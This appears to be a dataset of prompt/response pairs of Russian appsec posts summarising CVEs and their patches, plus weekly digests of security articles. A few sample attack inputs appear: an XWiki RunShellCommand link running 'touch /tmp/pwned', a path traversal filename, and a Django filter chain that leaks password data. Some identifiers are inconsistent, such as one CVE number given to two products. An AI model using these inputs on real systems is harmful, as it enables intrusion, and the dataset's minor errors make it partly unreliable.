| Write a post on the following topic,Интересные публикации по аппсеку за прошедшую неделю,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰Препринтна тему вычисляемых вручную «хэш»-функций, пригодных для генерации пользовательских паролей «в уме».📰 Вышла первая версия инструментаde4py, облегчающего задачу реверсинга обфусцированного Python-кода.📰 Опубликованырезультатыочередного аудита кодовой базы Tor Browser командой экспертов Cure 53.📰Обзоринструментария и техник угона учётных данных из браузеров.📰 Весьма детальныйразборприроды DLL Hijacking, потрохов загрузчика библиотек Windows и универсальной техники эксплуатации данной уязвимости.📰Статья, описывающая развитие рядовой Unrestricted File Upload до RCE на примере CVE-2021-27198 (загрузка произвольных файлов в Visualware MyConnection Server).📰 Подробноеописаниеархитектуры и принципов работы фаззера Cascade, предназначенного для тестирования RISC-V процессоров, через генерацию и выполнение корректных, объёмных и сложных программ." |
| Write a post on the following topic,Уязвимость выполнения кода в XWiki через VTL-шаблоны,"CVE-CVE-2023-37909 , обнаруженная в вики-платформеXWikiдо версий14.10.8и15.3-rc-1, может приводить к выполнению кода путем создания уникального объекта классаUIExtensionClassв соответствующем редакторе. Проблема заключается в попадании пользовательских данных в функции обработки VTL-шаблонов. Впатчедля пользовательских данных добавили функциюescapetool.xml(), которая заменяет символы&""<>'{на их числовые коды (&"<>'{), что предотвращает добавление дополнительных VTL-сущностей в шаблон." |
| Write a post on the following topic,Уязвимость DoS в Werkzeug до версии 3.0.1,"CVE-CVE-2023-46136 в WSGI веб-фреймворкеWerkzeugдо версии3.0.1может приводить к отказу в обслуживании (DoS). Уязвимость локализована в обработке загружаемых файлов, при которой для файла, начинающегося с управляющих символов: возврата каретки (CR) или перевода строки (LF), следует большое количество данных без этих же управляющих символов, то поиск строкиboundaryвыполняется в постоянно растущем буфере, что и приводит к неограниченному потреблению вычислительных ресурсов. Разработчики висправлениидобавили корректировку указателя на конец данных при отсутствии частиboundaryв составе принятых данных." |
| Write a post on the following topic,Уязвимость HTTP Request Smuggling в системе F5 BIG-IP.,"CVE-CVE-2023-46747 в системеF5 BIG-IPдо версий17.1.0.3.0.75.4, 16.1.4.1.0.50.5, 15.1.10.2.0.44.2, 14.1.5.6.0.10.6 и 13.1.5.1.0.20.2позволяет ""подделывать"" http-запросы к AJP серверу с помощью эксплуатации HTTP Request Smuggling. Уязвимость схожа сCVE-2022-26377, в которой нарушается логика проверки запроса при выставлении значения заголовка ""Transfer-Encoding"" в ""chunked, chunked"", что позволяет добавить ""контрабандный"" запрос к обычному, т.к. длина и контент запроса контролируются пользователем. Более подробный разбор можно посмотреть поссылке." |
| Write a post on the following topic,SQL-инъекция в Netentsec NS-ASG до версии 6.3,"CVE-CVE-2023-5700 в продукте для безопасного доступаNetentsec NS-ASGдо версии6.3включительно может приводить к SQL-инъекции. Данные из параметра ""jsoncontent"" POST-запроса без соответствующей проверки передаются в функциюdb_query, что позволяет атакующему встроить SQL-инъекцию в тело запроса и выполнить его." |
| Write a post on the following topic,Уязвимость CVE-2023-46119 в Parse Server приводит к DoS.,"CVE-CVE-2023-46119 в бэкенд-фреймворкеParse Serverдо версий5.5.6 и 6.3.1может приводить к DoS. Уязвимость заключается в том, что для переменной ""extension"" со значениемundefinedпоследующий вызов методаsplit()вызовет исключение, приводящее к аварийному завершению приложения.Исправлениесвязано с использованием оператора опциональной последовательности (?.) для формирования значения ""extension"", что позволяет обрабатывать значениеundefinedбез выдачи исключения." |
| Write a post on the following topic,Уязвимость в openCRX до версии 5.3.0 связанная с чтением локальных файлов и SSRF из-за неправильного использования XML external entity.,"CVE-CVE-2023-46502 , обнаруженная в CRMopenCRXдо версии5.3.0, может приводить кчтению локальных файлов и SSRF. Уязвимость заключается в использовании инстанса ""javax.xml.parsers.DocumentBuilderFactory"" без выставленных флагов, предотвращающих возможность использовать XML external entity. Впатчебыли добавлены настройки безопасности:- запрет объявления DOCTYPE ""http://apache.org/xml/features/disallow-doctype-decl"";- запрет на включение общих внешних сущностей ""http://xml.org/sax/features/external-general-entities"";- запрет на включение объектов внешних параметров или части внешнего DTD ""http://xml.org/sax/features/external-parameter-entities"";- полное игнорирование внешнего DTD ""http://apache.org/xml/features/nonvalidating/load-external-dtd""." |
| Write a post on the following topic,Уязвимость SSRF в приложении FoodCoopShop до версии 3.6.1,"CVE-CVE-2023-46725 в приложенииFoodCoopShopдо версии3.6.1может приводить кSSRF. Уязвимость заключается в формирования http-запросов на внешние ресурсы без контроля значения на принадлежность к ""белому"" списку. Висправлениивведена дополнительная проверка на содержании доменного имени http-запроса в ""белом"" списке доменов." |
| Write a post on the following topic,Уязвимость Prototype Pollution в библиотеке dot-diver до версии 1.0.2,"CVE-CVE-2023-45827 , обнаруженная в TypeScript библиотекеdot-diverдо версии1.0.2,может приводить кPrototype Pollution. Отсутствие проверок на свойство ""proto"" в функции ""setByPath"" приводит к появлению уязвимости.Патчдобавил проверку (""Object.prototype.hasOwnProperty"") на существование свойства в объекте до его присвоения." |
| Write a post on the following topic,"Уязвимость XSS в ""Pimcore Admin Classic Bundle"" до версии 1.2.0","CVE-CVE-2023-46722 в UI-бэкенде ""Pimcore Admin Classic Bundle"" до версии1.2.0может приводить кXSS. Уязвимость заключается в возможности исполненияjavascriptиз составаpdfдокументана стороне клиента. В исправлениях (commitиPR) добавили проверку на содержание js контента в pdf и блокирование отображения pdf-документа с js-кодом внутри." |
| Write a post on the following topic,High-risk vulnerabilities in Confluence Data Center and Server and Bitrix24,"CVE-CVE-2023-22515 ,CVE-2023-22518вConfluence Data Center and Serverявляются уязвимостями с высоким уровнем опасности, которые позволяют сбросить настройки Confluence и создать аккаунт неавторизованного администратора. Обладая полными правами доступа нарушитель способен выполнить любые действия. Позаявлениюразработчиков версии с исправлением уязвимостей являются7.19.16, 8.3.4, 8.4.4, 8.5.3, 8.6.1. Основными рекомендациями являются обновление версий до неуязвимых, отключение уязвимого Confluence от внешнего доступа. Как временная мера приводится рекомендация блокирования с уже известными векторами атак следующих точек доступа :-/json/setup-restore.action;-/json/setup-restore-local.action;-/json/setup-restore-progress.action.🐛 В продуктеBitrix24до версии22.0.300были раскрыты множественные уязвимости позволяющие:- RCE на стороне сервера (CVE-2023-1713,CVE-2023-1714);- XSS на стороне клиента (CVE-2023-1715,CVE-2023-1716,CVE-2023-1717,CVE-2023-1720);- DoS на стороне сервера (CVE-2023-1718);- внешний доступ к переменным окружения (CVE-2023-1719).Уязвимости имеют высокий уровень опасности, что требует срочного обновления инстансов Bitrix24. Подробные разборы приведены по следующим ссылкам -CVE-2023-1713,CVE-2023-1714,CVE-2023-1715 & CVE-2023-1716,CVE-2023-1717,CVE-2023-1718,CVE-2023-1719иCVE-2023-1720." |
| Write a post on the following topic,Обзор наиболее интересных публикаций по аппсеку за прошедшую неделю.,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰Самыегромкие атаки и наиболее заметные утечки от🟥📰 Очереднаячастьцикла статей «Выдающиеся программисты 21-го века», посвящённая Ральфу Мерклу, чьё имя известно куда меньшему количеству людей, по сравнению с его работами.📰Разборнабирающей обороты волны атак на CVE-2023-22518 (недостаточная авторизация в Atlassian Confluence). Здесь также стоит обратить внимание наразбор«соседней» уязвимости в том же продукте.📰Обзормеханизмов и проблем безопасности редактора VSCode «от создателей SonarQube».📰 Внушительнаястатьяот Брюса Шнайера (на правах соавтора) о принципе «развязки» (decoupling) в современных системах.📰 Втораячастьрайтапа от участников Pwn2Own об атаках на Netgear RAX30.📰Исследованиеот Aquasec о методах переобнаружения уязвимостей в opensource-проектах на ранних этапах их существования.📰РазборCVE-2023-32782 (OS Commanding в PRTG и Dicom C-ECHO sensor).📰 Вводнаястатьяоб управлении секретами в рамках CI/CD.📰Обзорrecon-фреймворка OWASP Nettacker." |
| Write a post on the following topic,"Уязвимость в CRM Group-Office, позволяющая чтение локальных файлов и SSRF.","CVE-CVE-2023-46730 ,обнаруженная в CRMGroup-Officeдо версий6.8.15,6.7.54и6.6.177,может приводить к чтению локальных файлов и SSRF. Уязвимость заключается в возможности атакующим задавать путь к файлу через схему ""file://"" при загрузке файлов. Это обеспечивается использованием функции ""$httpClient->download"", которая реализует загрузку файлов с удаленных источников. Впатчебыла исключена функциональность загрузки файлов из сторонних ресурсов." |
| Write a post on the following topic,Уязвимость повышения привилегий в Label Studio до версии 1.8.2 из-за захардкоженного SECRET_KEY.,"CVE-CVE-2023-43791 в приложенииLabel Studioдо версии1.8.2может использоваться для повышения привилегий. Уязвимость заключается в использовании захардкоженного секрета ""SECRET_KEY"", участвующего в формировании и валидации пользовательских сессий. Атакующий, зная данный секрет и хеш пользовательского пароля, получает возможность формировать легитимную сессионную куку. Висправленииразработчики добавили функцию ""generate_key_if_missing"", которая обеспечивает контроль наличия секрета при старте приложения, а при отсутствии его генерацию, используябиблиотечную функцию Django ""django.core.management.utils.get_random_secret_key""." |
| Write a post on the following topic,Уязвимость XSS в PHP-фреймворке Symfony из-за отсутствия санитизации данных.,"CVE-CVE-2023-46734 ,обнаруженная в PHP-фреймворкеSymfonyдо версий4.4.51,5.4.31и6.3.8может приводить кXSS. Появлению уязвимости способствовало отсутствие санитизации пользовательских данных в обработчиках фильтров: ""abbr_class"", ""abbr_method"", ""format_args"", ""format_args_as_text"", ""format_file"" и ""format_file_from_text"" темплейт-движка Twig в связке с опцией ""is_safe=html"". Впервомивторомпатчах были добавлены функции ""htmlspecialchars"" с флагами ""ENT_COMPAT"" и ""ENT_SUBSTITUTE"", которые преобразуют символы'&""<>в их html-мнемоники ("&'<>)." |
| Write a post on the following topic,SQL инъекция в ORM библиотеке Piccolo до версии 1.1.1,"CVE-CVE-2023-46722 в ORM библиотекеPiccoloдо версии1.1.1может приводить к SQL инъекции. Уязвимость заключается в возможности изменения SQL-запроса через значение имени точки сохранения при формировании транзакций с SQL-оператором SAVEPOINT. Висправлениибыла добавлена валидирующая функция ""validate_savepoint_name"", в которой проверяется наличие символов из значения имени в ""белом списке"" (string.ascii_letters + string.digits + ""-"" + ""_"")." |
| Write a post on the following topic,Эксплуатация CSRF уязвимости в XWiki для исполнения Groovy-макросов,"CVE-CVE-2023-46242 обнаруженная в вики-платформеXWikiдо версий14.10.7и15.2RC1может приводить к исполнению Groovy-макросов через эксплуатациюCSRFна пользовательской стороне. Уязвимости подвержен эндпойнт ""/xwiki/bin/edit/Main/"" для пользователей с правами на разработку и для которого отсутствует механизма защиты от CSRF атак. Впатчебыла добавлена проверка с использованием встроенного в XWiki механизма формирования и валидации CSRF токенов (класс ""org.xwiki.csrf.CSRFToken"")." |
| Write a post on the following topic,Обзор последних новостей и анализ в области кибербезопасности,"📌 Наиболее интересные публикации по аппсеку за прошедшую неделю📰Обзоризменений новой версии Wireshark 4.20.📰Введениев атаки E-mail Injection.📰 ДетальныйразборCVE-2023-47444 (Code Injection в OpenCart)📰Разбортехник атаки на CVE-2023-46604 (RCE в ActiveMQ)📰Статьяо весьма пикантном сценарии использования Flipper Zero😳📰 Заключительная,третьячасть цикла статей о безопасности VS Code.📰Райтаппроблем безопасности шэринговых сервисов глазами баг-хантера." |
| Write a post on the following topic,Возможность извлечения конфиденциальной информации через манипулирование фильтрами ORM Django в приложении Label Studio.,"CVE-CVE-2023-47117 , обнаруженная в приложенииLabel Studioдо версии1.9.2post0, может приводить к получению конфиденциальной информации через манипулирование фильтрами ORM Django. Уязвимость заключается в возможности пользователям задавать фильтры для отображения проектов (например, ""updated_by__active_organization""). Атакующий может создать цепочку фильтров (например, ""updated_by__active_organization__active_users__password"") и извлечь конфиденциальные данные пользователей.Патчдобавляет проверку значений фильтра по ""белому"" списку." |
| Write a post on the following topic,Уязвимость в библиотеке ImageMagick связанная с обработкой BMP-файлов,"CVE-CVE-2023-5341 в библиотекеImageMagickдо версии7.1.2может приводить к проблеме использования памяти после освобождения. Уязвимость заключается в неконтролируемом размереbmp-файла, который подлежит обработке. Висправлениибыло добавлено сравнение размера файла, указанного в ""bmp_info.file_size"", с фактическим размером данных." |
| Write a post on the following topic,Уязвимость XSS в системе мониторинга сети LibreNMS до версии 23.11.0,"CVE-CVE-2023-48295 , обнаруженная в системе мониторинга сетиLibreNMSдо версий23.11.0,может приводить кXSS. Уязвимость связана с формированием имен групп устройств (""$deviceGroup->name"") с использованием пользовательских данных, которые в дальнейшем попадают в состав ответа сервера. Впатчебыла добавлена функция ""htmlentities"", которая преобразует опасные символы""&'<>в их html-мнемоники ("&'<>)." |
| Write a post on the following topic,Уязвимость SQL-инъекции в Pimcore до версии 11.1.1,"CVE-CVE-2023-47637 , обнаруженная в платформе для менеджментаPimcoreдо версии11.1.1,может приводить кSQL-инъекции. К уязвимости приводило попадание пользовательских данных в состав SQL запроса в функции ""getFilterConditionExt"". Впатчебыла добавлена функции ""$db->quote"" для экранирования специальных символов и ""Helper::escapeLike"" для корректного формирования запроса с оператором ""LIKE""." |
| Write a post on the following topic,Уязвимость RCE в Netgate pfSense версии до 2.7.1,"CVE-CVE-2023-42326 вNetgate pfSenseдо версии2.7.1может приводить к RCE через внедрение команд. Уязвимость заключается в попадании имен интерфейсов, формируемых из пользовательских данных, в функцию исполнения шелл команд. В исправлении добавили сравнение имен интерфейсов с регулярным выражением ""/^gif[0-9]+$/"" для исключения внедрения недопустимых символов." |
| Write a post on the following topic,Уязвимость в XWiki Admin Tools позволяющая выполнение произвольного кода,"CVE-CVE-2023-48292 , обнаруженная в приложенииXWiki Admin Toolsдо версии4.5.1, может приводить к исполнению произвольного кода. Уязвимость заключается возможности запуска системных команд на эндпойнте/xwiki/bin/view/Admin/RunShellCommandбез проверки CSRF-токена. Атакующий может сформировать ссылку, для которой будет исполнена произвольная команда с административными правами (например,/xwiki/bin/view/Admin/RunShellCommand?command=touch%20/tmp/pwned).Патчдобавляет функциональность генерации/валидации CSRF-токенов с помощью функции ""services.csrf.isTokenValid""." |
| Write a post on the following topic,Уязвимость аутентификации в ownCloud до версии 10.13.1,"CVE-CVE-2023-48712 вownCloudдо версии10.13.1может приводить к обходу процесса аутентификации. Уязвимость заключается в возможности использования пустой строки для значения ""signing-key"" в качестве соли для функции формирования ключа ""hash_pbkdf2"". Висправлениидобавили проверку заполненности значения переменной ""$signingKey"" в функции ""verifySignature""." |
| Write a post on the following topic,"Уязвимость CVE-2023-48699 в библиотеке fastbots, позволяющая исполнение произвольного Python кода.","CVE-CVE-2023-48699 в библиотекеfastbotsдо версии0.1.5может приводить к исполнению произвольного Python кода. Уязвимость заключается в возможности исполнения через функцию ""eval"" данных, поступающих из файла ""locators.ini"". Атакующий может подменить файл ""locators.ini"" с измененной директивой ""locator_name"", включающей в себя произвольный Python код. Висправлениибыло исключено попадание пользовательских данных в функцию ""eval""." |
| Write a post on the following topic,Уязвимость Prototype Pollution в библиотеке sequelize-typescript,"CVE-CVE-2023-6293 , обнаруженная в библиотекеsequelize-typescriptдо версий2.1.6, может приводить кPrototype Pollution. Уязвимость связана с возможностью в функции ""deepAssign"" резолвинга атрибута объекта как прототипа объекта . Впатчебыла добавлена проверка по ""черному"" списку имен атрибутов (['proto', 'constructor', 'prototype'])." |
| Write a post on the following topic,Уязвимость авторизации в Pimcore до версии 11.1.1,"CVE-CVE-2023-48228 , обнаруженная в платформе для менеджментаPimcoreдо версии11.1.1, может приводить к обходу процесса авторизации. К уязвимости приводила ошибка логики - проверка параметра PKCE ""code_verifier"" в процессе валидации токена проходила даже при его отсутствии, что делает ""Proof Key for Code Exchange"" неэффективным. Впатчебыла добавлена проверка на существование ""code_verifier"" и при его отсутствии срабатывает исключение ""TokenError""." |
| Write a post on the following topic,XSS уязвимость в онлайн редакторе изображений minipaint,"CVE-CVE-2023-6461 описывает уязвимостьXSS(Cross-Site Scripting) для онлайн редактора изображенийminipaint до версии 4.14.0. Уязвимость позволяла вставлять и выполнять произвольный JavaScript-код на стороне клиента, когда пользователь взаимодействовал с определёнными элементами интерфейса. Впатчебыло реализовано экранирование пользовательских данных с использованием функцииHelper.escapeHtml, которая выполняет преобразование символов&, <, >, "", 'в их html-мнемоники (&<>"')." |
| Write a post on the following topic,"Уязвимость RCE в Chamilo LMS до версии 1.11.20, CVE-2023-3368.","CVE-CVE-2023-3368 , обнаруженная в системе управления обучениемChamilo LMS до версии 1.11.20, позволяет выполнить произвольный код (RCE). Уязвимость связана с возможностью исполнения кода в скриптеadditional_webservices.phpи является обходом предыдущей уязвимостиCVE-2023-34960.Исправлениевключает использование функцииescapeshellargдля корректной обработки параметров и проверку на наличие подстроки`..`в имени файла, чтобы предотвратить возможные попытки выхода за пределы директории." |
| Write a post on the following topic,Уязвимость Cross-Site Scripting в веб-приложении dpaste.,"CVE-CVE-2023-49277 приводит кCross-Site Scriptingв веб-приложенииdpaste до версии 3.8, которое используется для обмена текстовыми фрагментами кода. Уязвимость связана с обработкой ошибок и формированием ответа, содержащего пользовательские данные. Висправленииразработчики добавили использование функцииescapeиз фреймворкаDjangoдля экранирования входных данных, что предотвращает выполнение вредоносного кода." |
| Write a post on the following topic,Уязвимость в Foxit Reader позволяющая создать и исполнить вредоносный файл,"CVE-CVE-2023-35985 , обнаруженная вFoxit Reader до версии 12.1.3.15356, позволяет создавать произвольный вредоносный файл с возможностью его дальнейшего исполнения. Уязвимость возможна в результате использования функции API JavaScriptexportDataObject. Более детальное разбор приведен поссылке." |
| Write a post on the following topic,Уязвимость XSS в Uptime Kuma до версии 1.23.7,"CVE-CVE-2023-49276 связана с уязвимостью вUptime Kuma до версии 1.23.7 -инструмент для мониторинга, который позволяет интегрировать Google Analytics. Проблема заключалась в том, что идентификаторtagID, из состава недоверенных данных, участвовал в формировании ответа для пользователя, что приводило кXSS. Разработчикиисправилиуязвимость через экранированиеtagIDв контексте HTML-атрибута, используя функциюhtml-escaper." |
| Write a post on the following topic,Уязвимость в XWiki Change Request позволяет получить хэш пароля пользователя.,"CVE-CVE-2023-49280 , обнаруженная в приложенииXWiki Change Requestдо версии 1.10, позволяет нарушителю получить хэш пароля пользователя, выполнив редактирование профилей пользователей и скачав созданный XML-файл. Висправленииразработчики добавили функцию контроля прав на редактирование страницыisEditWithChangeRequestAllowedи функциюisObjectContainingPassword, в которой проверяют наличие пароля в формируемой странице. И при наличии пароля выдается исключение." |
| Write a post on the following topic,"Уязвимость в программе Squid до версии 6.5, приводящая к denial-of-service.","CVE-CVE-2023-49286 - уязвимость в программе кэширующего прокси-сервераSquid до версии 6.5, которая может приводить кdenial-of-service (DoS). Проблема связана с ошибкой в проверке файловых дескрипторовcrfd,cwfd,debug_logпри обработке процессаHelper. Впатчебыла добавлена функция контроляdupOrExitc вызовом исключения при отрицательном результате проверки." |
| Write a post on the following topic,Уязвимость XSS в GitHub репозитории mlflow/mlflow версии 2.9.0.,CVE-CVE-2023-6568 относится к уязвимостиCross-site Scripting (XSS)в репозиторииGitHub mlflow/mlflow версии 2.9.0. Уязвимость заключается во включении содержимого заголовка'Content-Type'в состав формируемогоresponseпри уведомлении об ошибке . Висправленииисключили участие заголовка запроса в формированииresponse. |
| Write a post on the following topic,"Уязвимости в Confluence и WordPress, приводящие к удаленному выполнению кода (RCE).","CVE-CVE-2023-22522 , обнаруженная вConfluence Data Server до версий 7.19.1, 8.4.5, 8.5.4 и в Confluence Data Center до версий 8.6.2 и 8.7.1, приводит кRCE. проблема возникает из-за уязвимостиTemplate Injection, которая позволяет нарушителю, включая с правами анонимного доступа, встроить инъекцию внутрь Confluence страницы. Более подробную информацию можно посмотреть в бюллетене безопасности поссылке.🐛 Критическая уязвимость вWordPress версиях 6.4-6.4.1, потенциально приводящая кRemote Code Execution. Уязвимость связана с классомWP_HTML_Tokenи функцией__destruct, которая является ""магическим"" методом и автоматически вызывается PHP при высвобождении объекта. В исправлении разработчики добавили в классWP_HTML_Tokenдругой ""магический"" метод__wakeup, внутри которого вызывается исключение, что предотвращает возможную реализацию атаки черезObject Injection. Детальная информация по уязвимости приведена встатье." |
| Write a post on the following topic,"""Обзор актуальных тем в области кибербезопасности и криптографии""","📌 Наиболее интересные публикации за прошедшую неделю📰Введениев работу с WPScan. На фоне последних CVE в плагинах Wordpress может быть актуально.📰 Вышла новая версияCryptolyzer— анализатора настроек множества протоколов, использующих криптографию.📰Разборвымогателя Rhysida.📰 Беглыйобзортехник, используемых Google для защиты прошивок сотовых модулей в Android.📰РазборCVE-2023-22518 (байпасс аутентификации в Confluence).📰 Втораячастьцикла статей, посвящённого истории криптографии.📰 Любопытнаястатьяоб опыте скрещивания языковых моделей с Syzkaller.📰 Внезапно, Log4Shell всё ещёактуальнана реальных системах.📰Планпогружения в сферу инфобеза от Яндекс Практикума.📰 Достаточно емкийобзоргенераторов случайных чисел. Список литературы заслуживает отдельного внимания.📰 Краткоеописаниезабавной CVE-2023-24893 (OS Commanding в VSCode).📰 Свыше 100форковзаведомо уязвимых приложений на различных языках и стеках." |
| Write a post on the following topic,Наиболее интересные публикации о безопасности и уязвимостях в IT.,"📌Наиболее интересные публикации за прошедшую неделю📰 Достаточно подробныйгайдпо анализу безопасности GraphQL-приложений.📰 Перваячастьцикла статей, описывающих принципы работы виртуальных машин на примере VMProtect.📰 Исчерпывающийгайдпо атакам SMTP Smuggling.📰 Введениев написание шаблонов для SemGrep.📰Плагинк IDA, позволяющий осуществлять поиск в бинарниках посредством выполнения запросов.📰 Введениев фаззинг с помощью LibFuzzer.Астрологи объявили неделю CVE. Количество разборов увеличилось вдвое.📰CVE-2023-42793(RCE в JetBrains TeamCity).📰CVE-2023-6483(недостаточная аутентификация в ADiTaaS).📰CVE-2023-50164(загрузка произвольных файлов в Apache Struts). А такжеproof-of-concept.📰CVE-2023-47271(RCE в PKP-WAL)." |
| Write a post on the following topic,Уязвимость Path Traversal в платформе разработки Machine Learning.,"CVE-CVE-2023-6753 , обнаруженная в платформе разработкиMachine Learning до версии 2.9.2, приводит к уязвимостиPath Traversal. Проблема заключалась в использовании функцииposixpath.basename, в которой не учитывался символ""\"", извлекаемый из URL. Эта особенность позволяла нарушителю манипулировать путем к файлу в ОС Windows. Висправлениибыла заменена функцияposixpath.basenameнаos.path.basename, которая уже обрабатывает символы""\""и""/""одинаковым образом." |
| Write a post on the following topic,Уязвимость в Uptime Kuma позволяющая сохранять доступ без выхода из системы после изменения пароля.,"CVE-CVE-2023-49804 , выявленная в инструменте мониторингаUptime Kuma до версий 1.3.3 и 1.23.9,которая позволяет злоумышленнику получить несанкционированный доступ к учетным записям пользователей. Уязвимость давала возможность авторизованным пользователь сохранять доступ без выхода из системы даже после изменения пароля. Впатчепри сбросе и изменении пароля выполняется вызов функцииdisconnectAllSocketClients, которая выполняет разрыв всех ранее установленных соединений." |
| Write a post on the following topic,Vulnerability in GLPI asset and IT management package leading to arbitrary file upload.,"CVE-CVE-2023-46726 , обнаруженная в пакете для управления активами и информационными технологиямиGLPI до версии 10.0.11, приводит кArbitrary File Upload, с использованием формы конфигурации сервера LDAP. Дляисправлениядобавили функциюisFilepathSafe, которая проверяет схему и нормализует директорию." |
| Write a post on the following topic,Уязвимость Buffer Overflow в Moonlight Game Streaming Project из-за использования функции sprintf,"CVE-CVE-2023-42799 , обнаруженная в одном из пакетовMoonlight Game Streaming Project, приводит к уязвимостиBuffer Overflow. Проблема заключается в небезопасном использовании функцииsprintf. Впатчеразработчики ввели контроль на размер данных и замели функциюsprintfна ее безопасный аналогsnprintf." |
| Write a post on the following topic,Уязвимость Path Traversal в web-фреймворке Struts,"CVE-CVE-2023-50164 , обнаруженная в популярном web-фреймворкеStruts до версии 2.5.33 и6.3.0.2, приводит к потенциальномуPath Traversal. Уязвимость обусловлена недостаткомFileUploadInterceptorпри формировании значений<file name>FileName, которое может содержать вредоносную нагрузку (например,..\..\..\..\..\..\attack.bin) из состава POST-запроса. Более детальную информацию по уязвимости можно посмотреть вобзоре." |
| Write a post on the following topic,CVE-2024-21663: OS Command Injection в DiscordRecon до версии 0.0.8,"CVE-CVE-2024-21663 , обнаруженная в ботеDiscordRecon до версии 0.0.8, приводит кOS Command Injection. Проблема заключалась в попадании недоверенных данных в функциюsubprocess.Popen()в состав аргументов команды ""prips {argument}"". Висправлениибыла добавлена функция санитизации -CommandInjection.sanitizeInput, которая использует функцию экранированияshlex.quote()." |
| Write a post on the following topic,Уязвимость в WordPress плагине Unofficial Mobile BankID Integration из-за функции unserialize(),"CVE-CVE-2023-51700 , выявленная в WordPress плагинеUnofficial Mobile BankID Integrationдо версии 1.0.1. Уязвимость обусловлена использованием функцииunserialize()над недоверенными данными, что может приводить кDeserialization of Untrusted Data. Впатчеисключили использование функций сериализации/десериализации и перешли на хранение данных в формате json." |
| Write a post on the following topic,"Обнаруженная уязвимость (CVE-2023-52086) в PHP backend для resumable.js, приводящая к произвольной загрузке файлов.","CVE-CVE-2023-52086 , обнаруженная вPHP backend for resumable.js до версии 0.1.4, приводит кArbitrary File Upload. Дляисправлениядобавили функцию безопасного формирования имени файлаcreateSafeName(string $name), которая использует пакетOndrejVrto\FilenameSanitize\FilenameSanitize." |
| Write a post on the following topic,Уязвимость SSRF в приложении Audiobookshelf,"CVE-CVE-2023-51665 , найденная в приложенииAudiobookshelf до версии 2.7.0, приводит к уязвимостиServer-Side Request Forgery (SSRF). Проблема заключается в формированииurlна основе пользовательских данных, что позволяло конструировать неразрешенные пути . Впатчеразработчики реализовали формирование пути с использованием классаURLи дополнительным контролем на принадлежность к разрешенной группе." |
| Write a post on the following topic,Уязвимость Unrestricted File Upload в платформе разработки Machine Learning,"CVE-CVE-2023-6976 , в платформе разработкиMachine Learning до версии2.9.2, приводит кUnrestricted File Upload. Уязвимость обусловлена в обходе функции валидации и использовании пути, который поступает из пользовательских данных. Висправлениибыла изменена логика формирования пути к файлу, путем приведения пути к существующему (local_file_uri_to_path) и проверки на выход за границы каталога." |
| Write a post on the following topic,HTTP Request Smuggling в сервере Puma,"CVE-CVE-2024-21647 , найденная в сервереPuma до версии 5.6.8 и 6.4.2, приводит кHTTP Request Smuggling. Опасное поведение возникает в процессе обработки частей запроса для механизмаchunked transfer encoding. Дляисправленияразработчики ограничили размерchunk headerиchunk extensions. Без этого ограничения атакующий мог неограниченно потреблять ресурсы ЦП и сети." |
| Write a post on the following topic,Уязвимость XSS в шаблонизаторе Fiber,"CVE-CVE-2024-22199 , выявленная вшаблонизаторе для Fiber до версии 3.1.9, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена возможностью внедрения пользовательских данных при рендере шаблона без экранирования. Висправлениибыло внедрена настройка автоматического экранирования (autoescape=true) всех данных поступающих в шаблон." |
| Write a post on the following topic,XXE-уязвимость в библиотеке fontTools Python,"CVE-CVE-2023-45139 , обнаруженная в Python библиотекеfontTools до версии 4.28.2 (включительно) и 4.43.0, приводит кXML External Entity Injection (XXE). Проблема заключалась в том, что атакующий может использовать External Entity в файле шрифта, содержащего SVG таблицу. Висправлениив функцииsubset_glyphs(), которая обрабатывает данные в SVG формате, в вызов методаetree.XMLParser()добавили параметрresolve_entities=False, запрещающий обрабатывать External Entity." |
| Write a post on the following topic,SQL Injection в Nginx UI до версии v2.0.0.beta.9,"CVE-CVE-2024-22196 , обнаруженная вNginx UI до версии v2.0.0.beta.9, приводит кSQL Injection. Проблема находится в обработчикеOrderAndPaginate()и заключается во внедрении данных из запроса (параметрыorderиsort_by) без санитизации в SQL-запрос . Висправлениибыла реализована проверка параметров запросаorderиsort_byна принадлежность соответствующим “белым” спискам." |
| Write a post on the following topic,Уязвимость Improper Access Control в GitLab,"CVE-CVE-2023-7028 , найденная вGitLab CE/EE версий от 16.1 до 16.1.6, от 16.2 до 16.2.9, от 16.3 до 16.3.7, от 16.4 до 16.4.5, от 16.5 до 16.5.6, от 16.6 до 16.6.4 и от 16.7 до 16.7.2, приводит кImproper Access Control, в результате чего появляется возможность отправки письма о сбросе пароля на электронной адрес непроверенной почты. Описание бюллетеня безопасности можно найти поссылке." |
| Write a post on the following topic,Уязвимость в Mock с использованием Jinja2 для RCE,"CVE-CVE-2023-6395 , обнаруженная в программном обеспеченииMock, которая позволяет злоумышленнику использовать повышение привилегий дляRCE. Проблема заключалась в возможности исполнения кода при обработке шаблоновJinja2. Одним из вариантовисправленияпри подготовке шаблона для рендера предлагается использоватьjinja2.sandbox, которая позволяет перехватывать и ограничить доступ за пределы разрешенного окружения." |
| Write a post on the following topic,Уязвимость XSS в фреймворке создания admin-панели AVO,"CVE-CVE-2024-22191 , найденная в фреймворке создания admin-панелиAVO до версии 2.47 и 3.3.0, приводит кCross-Site Scripting (XSS). При редактировании страницы проекта существует возможность внедренияpayloadатакующего, который будет встраиваться в код страницы при его дальнейшем отображении. Дляисправленияразработчики добавили функции санитизацииDOMPurify.sanitize()для полей, через которые была возможность встраиванияpayload." |
| Write a post on the following topic,Обход аутентификации в Nextcloud Global Site Selector,"CVE-CVE-2024-22212 , выявленная вNextcloud Global Site Selector до версии 1.4.1, 2.1.2, 2.3.4 или 2.4.5, приводит к обходу аутентификации. Уязвимость обусловлена ошибкой в логике аутентификации пользователя, которая позволяла пользователю аутентифицироваться с пустым паролем. Висправлениибыла изменена логика проверки наличия пароля и при его отсутствии аутентификация не производится." |
| Write a post on the following topic,CVE-2024-22419 приводит к Buffer Overflow в Vyper до версии 0.3.10,"CVE-CVE-2024-22419 , найденнаяв Vyper до версии 0.3.10 (включительно), приводит кBuffer Overflow. Дляисправленияразработчики ввели буфер ограниченной длины относительно максимально возможной." |
| Write a post on the following topic,OGNL инъекция в Confluence ведет к удаленному выполнению кода,"CVE-CVE-2023-22527 , выявленная вConfluence Data Center and Server до версии 8.5.4 и Confluence Data Center до версии 8.6.0, 8.7.1, приводит кRemote Code Executionчерез инъекциюOGNL выражений. Описание бюллетеня безопасности можно найти поссылке. Детальный разбор уязвимости приведен в следующейстатье." |
